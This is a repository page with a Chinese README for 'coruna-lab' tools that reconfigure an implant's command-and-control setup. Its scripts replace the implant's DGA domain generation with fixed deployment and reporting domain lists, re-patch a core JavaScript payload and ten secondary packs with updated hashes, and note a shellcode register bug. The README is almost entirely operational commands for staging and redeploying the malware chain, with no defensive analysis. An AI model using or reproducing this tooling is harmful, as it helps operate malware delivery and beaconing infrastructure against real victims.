Files
coruna-lab/tools
hashbro d4fb538997 init
2026-08-05 04:04:06 +08:00
..
2026-08-05 04:04:06 +08:00
2026-08-05 04:04:06 +08:00
2026-08-04 05:00:42 +08:00
2026-08-04 05:00:42 +08:00
2026-08-05 04:04:06 +08:00
2026-08-05 04:04:06 +08:00
2026-08-05 04:04:06 +08:00
2026-08-05 04:04:06 +08:00
2026-08-05 04:04:06 +08:00
2026-08-04 05:00:42 +08:00

coruna-lab 工具:DGA seed / 固定域名

推荐:固定域名列表(多域名探测)

植入体本身已有「候选列表里哪个可用用哪个」。脚本把 Deployment / Reporting 的 DGA 生成替换为你给的域名列表,并同步改:

  • core(erupt_flee.js + daily.html 的 sha256/size)
  • 全部 type0x01 二级包(10 个 .min.js)
cd coruna-lab
# 需 py7zr + pycryptodome(macOS 可用 /usr/bin/python3;Homebrew python 建议 venv)
pip3 install py7zr pycryptodome

python3 tools/new_project.py \
  --deployment-domains 'www.dep1.example,www.dep2.example' \
  --reporting-domains  'www.rep1.example,www.rep2.example,www.rep3.example'

也支持重复传参:

python3 tools/new_project.py \
  --deployment-domains www.dep1.example \
  --deployment-domains www.dep2.example \
  --reporting-domains  www.rep1.example \
  --reporting-domains  www.rep2.example

产物(new_project.py 写入 server/public/):

  • server/public/web/…、server/public/sync/ — 可直接由 Laravel public 提供
  • server/public/out/seeds.json — 内部仍写入 seed(供池身份匹配)
  • server/public/out/domains.json — 最终生效的域名列表
  • server/public/out/sync/MANIFEST.json — core sha/size + domains

约束:

  • 每池最多 8 个域名,单域名 ≤ 63 ASCII
  • 可写 https://host(会自动去掉 scheme/path/port)
  • 部署后把这些域名 DNS/hosts 指到你的 lab server(443)
  • Deployment 需响应 /sync/daily.html;Reporting 需 /api/user/query → OK
  • daily.html 打到 Deployment 域名(不是投递站 /web/...);type-0x01 起来后才会请求
  • 固定域名 shellcode 曾有 callee-saved 寄存器未保存的 bug(会在探测前崩);请用当前 tools/_domain_patch.py 重新 --apply 后再部署 web/ + sync/
  • macOS 建议用 /usr/bin/python3(需 py7zr + pycryptodome);Homebrew 3.14 常缺 Crypto

仅重建(已有 server/public web/sync)

# 若尚无 web/ + sync/,--apply 会自动从 source/ 复制一份
python3 tools/patch_all.py --apply --root server/public \
  --deployment-domains 'www.dep1.example,www.dep2.example' \
  --reporting-domains  'www.rep1.example,www.rep2.example'

旧模式:只换 DGA seed(算域名)

不传 --*-domains 时行为与以前相同:随机/指定 seed,DGA 生成候选域名。

python3 tools/new_project.py
# 或
python3 tools/new_project.py \
  --deployment-seed 09d0b8d58a71653cd1c89c64c866f2e6 \
  --reporting-seed  2d2aebba0bf3d7d694194a7ab93b0a96

Seed 格式

  • ASCII,长度 ≤ 32(二进制槽位定长 32)
  • 推荐正好 32 个十六进制字符
  • Deployment / Reporting 各一个

分步脚本

# 二级包 type0x01
python3 tools/patch_secondary_packs.py \
  --deployment-seed <32hex> --reporting-seed <32hex> \
  --deployment-domains 'a.com,b.com' --reporting-domains 'c.com,d.com' \
  --root . --apply

# core + daily 校验
python3 tools/patch_core.py \
  --deployment-seed <32hex> --reporting-seed <32hex> \
  --deployment-domains 'a.com,b.com' --reporting-domains 'c.com,d.com' \
  --root . --apply

# 只算 DGA 域名(固定域名模式不需要)
python3 tools/compute_dga_domains.py \
  --deployment-seed <32hex> --reporting-seed <32hex> -n 5

源 dylib 仍读自 coruna-online/;--apply 写入工作树 web/ + sync/(不会写 source/)。